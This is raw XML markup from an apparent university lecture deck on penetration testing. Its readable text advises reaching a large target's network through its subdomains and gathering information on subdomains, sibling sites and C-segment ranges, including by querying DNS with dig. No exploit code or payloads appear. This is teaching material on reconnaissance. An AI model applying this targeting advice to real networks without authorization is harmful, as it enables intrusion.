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0" r:id="rId3"/>
    <p:sldId id="280" r:id="rId4"/>
    <p:sldId id="281" r:id="rId5"/>
    <p:sldId id="371" r:id="rId6"/>
    <p:sldId id="282" r:id="rId7"/>
    <p:sldId id="283" r:id="rId8"/>
    <p:sldId id="284" r:id="rId9"/>
    <p:sldId id="285" r:id="rId10"/>
    <p:sldId id="286" r:id="rId11"/>
    <p:sldId id="287" r:id="rId12"/>
    <p:sldId id="288" r:id="rId13"/>
    <p:sldId id="289" r:id="rId14"/>
    <p:sldId id="290" r:id="rId15"/>
    <p:sldId id="291" r:id="rId16"/>
    <p:sldId id="292" r:id="rId17"/>
    <p:sldId id="294" r:id="rId18"/>
    <p:sldId id="295" r:id="rId19"/>
    <p:sldId id="296" r:id="rId20"/>
    <p:sldId id="298" r:id="rId21"/>
    <p:sldId id="299" r:id="rId22"/>
    <p:sldId id="300" r:id="rId23"/>
    <p:sldId id="301" r:id="rId24"/>
    <p:sldId id="302" r:id="rId25"/>
    <p:sldId id="303" r:id="rId26"/>
    <p:sldId id="304" r:id="rId27"/>
    <p:sldId id="305" r:id="rId28"/>
    <p:sldId id="306" r:id="rId29"/>
    <p:sldId id="307" r:id="rId30"/>
    <p:sldId id="308" r:id="rId31"/>
    <p:sldId id="309" r:id="rId32"/>
    <p:sldId id="310" r:id="rId33"/>
    <p:sldId id="311" r:id="rId34"/>
    <p:sldId id="312" r:id="rId35"/>
    <p:sldId id="313" r:id="rId36"/>
    <p:sldId id="314" r:id="rId37"/>
    <p:sldId id="372" r:id="rId38"/>
    <p:sldId id="315" r:id="rId39"/>
    <p:sldId id="316" r:id="rId40"/>
    <p:sldId id="317" r:id="rId41"/>
    <p:sldId id="319" r:id="rId42"/>
    <p:sldId id="320" r:id="rId43"/>
    <p:sldId id="322" r:id="rId44"/>
    <p:sldId id="323" r:id="rId45"/>
    <p:sldId id="324" r:id="rId46"/>
    <p:sldId id="325" r:id="rId47"/>
    <p:sldId id="326" r:id="rId48"/>
    <p:sldId id="327" r:id="rId49"/>
    <p:sldId id="328" r:id="rId50"/>
    <p:sldId id="330" r:id="rId51"/>
    <p:sldId id="329" r:id="rId52"/>
    <p:sldId id="331" r:id="rId53"/>
    <p:sldId id="332" r:id="rId54"/>
    <p:sldId id="333" r:id="rId55"/>
    <p:sldId id="334" r:id="rId56"/>
    <p:sldId id="373" r:id="rId57"/>
    <p:sldId id="335" r:id="rId58"/>
    <p:sldId id="336" r:id="rId59"/>
    <p:sldId id="337" r:id="rId60"/>
    <p:sldId id="338" r:id="rId61"/>
    <p:sldId id="340" r:id="rId62"/>
    <p:sldId id="339" r:id="rId63"/>
    <p:sldId id="341" r:id="rId64"/>
    <p:sldId id="342" r:id="rId65"/>
    <p:sldId id="343" r:id="rId66"/>
    <p:sldId id="344" r:id="rId67"/>
    <p:sldId id="374" r:id="rId68"/>
    <p:sldId id="345" r:id="rId69"/>
    <p:sldId id="346" r:id="rId70"/>
    <p:sldId id="347" r:id="rId71"/>
    <p:sldId id="348" r:id="rId72"/>
    <p:sldId id="349" r:id="rId73"/>
    <p:sldId id="375" r:id="rId74"/>
    <p:sldId id="350" r:id="rId75"/>
    <p:sldId id="351" r:id="rId76"/>
    <p:sldId id="376" r:id="rId77"/>
    <p:sldId id="352" r:id="rId78"/>
    <p:sldId id="353" r:id="rId79"/>
    <p:sldId id="355" r:id="rId80"/>
    <p:sldId id="356" r:id="rId81"/>
    <p:sldId id="357" r:id="rId82"/>
    <p:sldId id="358" r:id="rId83"/>
    <p:sldId id="359" r:id="rId84"/>
    <p:sldId id="360" r:id="rId85"/>
    <p:sldId id="362" r:id="rId86"/>
    <p:sldId id="361" r:id="rId87"/>
    <p:sldId id="363" r:id="rId88"/>
    <p:sldId id="364" r:id="rId89"/>
    <p:sldId id="365" r:id="rId90"/>
    <p:sldId id="366" r:id="rId91"/>
    <p:sldId id="367" r:id="rId92"/>
    <p:sldId id="368" r:id="rId93"/>
    <p:sldId id="369" r:id="rId94"/>
    <p:sldId id="370" r:id="rId95"/>
    <p:sldId id="259" r:id="rId9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2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g>
</file>

<file path=ppt/media/image59.jpg>
</file>

<file path=ppt/media/image6.png>
</file>

<file path=ppt/media/image60.png>
</file>

<file path=ppt/media/image61.jpg>
</file>

<file path=ppt/media/image62.png>
</file>

<file path=ppt/media/image63.png>
</file>

<file path=ppt/media/image64.png>
</file>

<file path=ppt/media/image6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jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/></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11EE5A-6C65-4EE9-9C68-D8D397B533D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0D3E9CD-9347-4422-BD86-6FE94687BB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1E18FC6-76A2-476E-A340-EA5E36B69933}"/>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5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0283843-AB80-4F05-8C1F-7E81F5EF1A5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3CD1701-C2EC-403E-B32D-B9303C14C4C3}"/>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2510008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40E8A8-387F-4C2A-9C84-683E3B1E68A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361801A-7D64-4A1E-9720-1AFB14031F8F}"/>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B97A97F-A9E8-4C62-81D1-4BCC017C821F}"/>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5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B997C492-DD23-4E45-B0DE-10402493B45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7E7E686-D618-4242-8647-102C2AF708EE}"/>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1620081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41073F4-5807-4285-BC8E-E455B501E50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52B9B45-2D8F-40BF-A679-BD5232DB4B07}"/>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5234794-1598-4F97-989D-C104459CD7D8}"/>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5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F097345A-E2FB-4250-8B07-6B47F216D11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1357246-9A9F-4F46-A675-99848CC4D871}"/>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3697939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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="29232" y="5156200"/>
            <a:ext cx="8179003" cy="1701800"/>
            <a:chOff x="21924" y="3867150"/>
            <a:chExt cx="6134252" cy="1276350"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1026"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1924" y="3867150"/>
              <a:ext cx="6134252" cy="127635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5" descr="F:\百度云\logo.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print">
              <a:duotone>
                <a:prstClr val="black"/>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>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a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="21924" y="4125054"/>
              <a:ext cx="1410747" cy="299951"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="F:\百度云\logo.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D281AE1F-8688-47A5-94F1-E2C490F03AA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7220517" y="357522"/>
            <a:ext cx="2258216" cy="480137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F98B5197-73FD-42E0-8173-02A31EF254E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9478733" y="312589"/>
            <a:ext cx="2377907" cy="619183"/>
            <a:chOff x="7109050" y="234441"/>
            <a:chExt cx="1783430" cy="464387"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2" name="图片 1"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId6" cstate="print">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect b="37941"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7109050" y="234441"/>
              <a:ext cx="802431" cy="464387"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8228B04A-B5D3-4EBA-858F-4F9BD52F94C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId6" cstate="print">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect t="62058"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7824894" y="257588"/>
              <a:ext cx="1067586" cy="377740"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25017307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96534" y="164637"/>
            <a:ext cx="1069908" cy="997744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId4">
                    <a14:imgEffect>
                      <a14:artisticTexturizer/>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43339" y="5138377"/>
            <a:ext cx="8176684" cy="17060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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="5138376"/>
            <a:ext cx="8176684" cy="1719624"/>
          </a:xfrm>
          <a:prstGeom prst="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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94045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14DE29-F0CE-4172-ABF4-A127BE89F1A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98FB26F-4496-4835-AE2C-2E30ED642E01}"/>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B2B20C6-800A-4CF1-A607-969674441477}"/>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5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71D141BF-6D34-43EE-999E-3E1889B6396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326006A-CE6F-4001-B9AC-85A0063DBC11}"/>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3864190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1BB5C9-27E8-4614-ACDC-6261B3E50D2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9EA097B-5617-414D-BBCC-F912CE4E1A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83A23CDC-56E1-455B-B9D0-64ED9BC0B6F1}"/>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5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{674E4202-CCA2-43B2-B2CF-603B91858AF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ADDF9B4-FB9B-4E85-AFD7-5A72EC6F9FDD}"/>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2589545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6F270E-4377-4D90-82AF-0F38FE7FFA2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3F49B52-E31E-47A2-ADE5-D23E074E025A}"/>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B4869398-616B-439C-97E3-35749A650001}"/>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8B69F2A-EFEA-46E8-A7D8-785ACB106120}"/>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6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D109C1E7-31C6-4AB7-B982-B367690A3FB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0AB52B5-D4B0-46C1-AB35-FB6526E0BC43}"/>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225513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8AC9E1-A721-4E9E-9271-DDABFAC62EF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C63F475-0181-4DC1-8923-B2CD53C848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A96FE913-BC0A-4044-9223-E82BF2131C2D}"/>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8C31D94-88D0-41B1-866B-4CDF0AA75E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03C1CD78-510E-4A4D-85CE-82B8F694F611}"/>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2877F437-F9F0-4D1D-9854-5E653CFC430C}"/>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8" name="页脚占位符 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91F1DCF0-3081-4F8D-A415-7FA5F7D3D6B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58160F6-935C-430A-9742-67F3267B73E4}"/>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4188999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C76D2D-FC4E-4D28-82FE-826E84395A46}"/>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3EBDBA5-1E08-4311-91C4-6DFE8EEC2F33}"/>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4" name="页脚占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6736ABB6-5370-48E1-8EEF-8A25E0960CC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3297AD6-4D6A-4C84-B5AF-68F0C1170840}"/>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312903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0C818D8-8CB8-4ADA-8C3A-780F14ED171E}"/>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3" name="页脚占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1177250B-7A06-4AFF-9F33-FD4B342370A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239C423-E109-4969-A712-EF3627C64015}"/>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1175030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88916A-D5F2-4312-862E-A08382D4CD4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B446D40-0E37-4F93-A5D1-FCE5A5E184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44527224-63C2-4519-A852-94A0182AB4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0796CD0B-EBA2-4C40-AC4E-DA9781CF6DF7}"/>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6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{479958BE-5C6F-4103-B634-0A56116D912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BAA9AC0-5ADA-4BDA-89EC-0622D2DB7A9A}"/>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4219149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032E93-DC35-40D1-B00E-3226056FC4F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0581CC7-75E2-4715-93F9-2F16B9D8B9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0C469C6C-E9D1-48DF-9D8B-973DDF8A08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D994BE7-EEEA-437B-9C90-74D742ECD528}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BF334696-1CF1-4E26-ADFE-59F9AE7C17DE}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2019/7/2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31FFF5C2-F762-4B76-8D80-FD47C8684E9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894C426-2B06-4C67-B5AE-13F014196133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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1626294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A67CDC2-7B44-482A-B16B-F71F376E34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98CCFC9-7A22-4D03-96B6-DFD8E60D879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57BBE76-7684-4BB0-8609-A953F7C1AC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334696-1CF1-4E26-ADFE-59F9AE7C17DE}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2019/7/2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BDAD19-E958-40B8-A723-4A91F5DACB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6D14C99-5528-4907-96C5-15CF12DBDB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FE37A2-4E26-4E95-AA24-76CEBF04BB97}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25683311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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zhuanlan.zhihu.com/p/36536961" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.jp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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.jpg"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://host/~user" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623393" y="2520115"/>
            <a:ext cx="11125548" cy="1044503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="121920" tIns="60960" rIns="121920" bIns="60960" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3733" b="1" dirty="0">
                <a:latin typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>渗透测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3733" b="1" dirty="0">
              <a:latin typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{260D9E52-70CA-480C-9BE5-111E8D70BCD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17816" y="1316766"/>
            <a:ext cx="12192000" cy="748988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4267" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>电子科技大学 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4267" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4267" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>网络空间安全研究中心（暨学院）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4267" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正姚体" panose="02010601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5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1C4E70-BB69-4FB0-9D26-E398C2973FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332927" y="2008805"/>
            <a:ext cx="5536027" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>如果我们的目标网络规模比较大，直接从目标主域入手显然是很不理智的，因为像这种规模的目标一般主域都是重点防护区域。与其浪费那个时间，不如先从目标的某个子域进去，然后再想办法迂回接近我们的真正目标，这样无疑是个比较好的选择。此时，也就不难理解那句话了，安全本就是一个全面立体的概念，单单只是边界几个点的安全，那不叫真正的安全。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>命令对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器进行挖掘。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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子域名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11342E0-F122-4220-BD1D-7A42AA9BA1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6315164" y="1340578"/>
            <a:ext cx="4307589" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>子域名，旁站，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>段 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF162308-D97D-4432-BF40-9FD9A59C433A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5948116" y="1907505"/>
            <a:ext cx="6108700" cy="3564890"/>
          </a:xfrm>
